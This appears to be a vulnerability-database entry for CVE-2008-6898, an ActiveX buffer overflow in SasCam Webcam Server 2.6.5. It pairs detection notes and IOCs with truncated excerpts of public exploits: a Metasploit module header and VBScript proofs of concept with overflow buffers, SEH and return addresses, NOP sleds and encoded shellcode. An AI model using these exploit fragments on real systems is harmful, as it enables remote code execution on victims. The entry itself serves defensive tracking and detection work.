CVE-2008-6898
Published 2009-08-05
Priority P3 · 52 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 31.74% (98.1th percentile)
Buffer overflow in the XHTTP Module 4.1.0.0 in the ActiveX control for SaschArt SasCam Webcam Server 2.6.5 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long argument to the Get method and other unspecified methods.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| saschart | sascam_webcam_server | — | — |
Detection & IOCs (extracted from sources)
- bytes: EIP return address: 0x77E37EEC (call esp, User32.dll)
- bytes: SEH overwrite nseh: %eb%06%90%90 (short jump + NOPs)
- bytes: SEH overwrite seh: 0x72D1204E (msacm32.drv)
- bytes: Heap-spray return address: 0x0c0c0c0c
Detection notes:
- Detect exploitation attempts by monitoring for ActiveX Get() method calls with arguments exceeding 8293 bytes (the buffer size used in PoC exploits).
- Detect the SEH-based exploitation variant by its buffer of 8349 'A' bytes followed by an SEH overwrite pattern targeting the msacm32.drv gadget at 0x72D1204E.
- The ActiveX control is not marked safe for scripting; monitor for instantiation of the SasCam XHTTP ActiveX control (XHTTP Module 4.1.0.0) in browser processes.
- The heap-spray pattern using 0x0c0c0c0c as the return address is characteristic of the Metasploit module for this CVE; look for this value in memory or in network-delivered HTML.
- Payload delivery is via a crafted HTML file; monitor for HTML files containing unescape() heap-spray patterns combined with ActiveX Get() method invocations.
Caveats:
- The EIP overwrite ROP gadget (call esp in User32.dll at 0x77E37EEC) is specific to a particular Windows/DLL version and will not be reliable across different patch levels.
- The SEH overwrite gadget (0x72D1204E in msacm32.drv) and the heap-spray return address (0x0c0c0c0c) were both tested only on Windows XP SP3 with IE 7; exploitation on other targets requires different offsets.
- Payload space is limited to 1024 bytes, with null bytes as bad characters; shellcode must be encoded accordingly.
No detection rules found.
Exploit-DB: SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)
exploitdb · 2010-09-25
---
##
# $Id: sascam_get.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow',
'Description' => %q{
The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.
By passing an overly long argument via the Get method, a remote attacker could
overflow a buffer and execute arbitrary code on the system with the privileges
of the user. This control is not marked safe for
Exploit-DB: SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
exploitdb · 2010-07-03
---
'SEH Overwrite exploited by Blake
'Original EIP method by callAX
'Tested on XP SP3/IE7 in virtualbox
'$ nc 192.168.1.155 4444
'Microsoft Windows XP [Version 5.1.2600]
'(C) Copyright 1985-2001 Microsoft Corp.
'
'C:\Documents and Settings\blake\Desktop>
buffer = String(8349, "A")
nseh = unescape("%eb%06%90%90") ' short jump
seh = unescape("%4E%20%D1%72") ' 0x72D1204E [msacm32.drv]
nops = String(20, unescape("%90")) ' nop sled
junk = String(2000, "C")
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%3
Exploit-DB: SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow
exploitdb · 2008-12-29
---
Sub rootIT()
put_s0m3_shit = String(8293, "a")
eip = unescape("%EC%7E%E3%77") // call esp User32.dll Module 77 E3 7E EC
noping = String(20, unescape("%90"))
lnj3ctc0d3 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
unescape("%4f%35%42%52%41%50%4b%4e%49%
Metasploit: SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow
The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user. This control is not marked safe for scripting; please choose your attack vector carefully.
No writeups or analysis indexed.
References:
- http://www.exploit-db.com/exploits/14195
- http://www.securityfocus.com/bid/33053
- https://exchange.xforce.ibmcloud.com/vulnerabilities/47654
- https://www.exploit-db.com/exploits/7617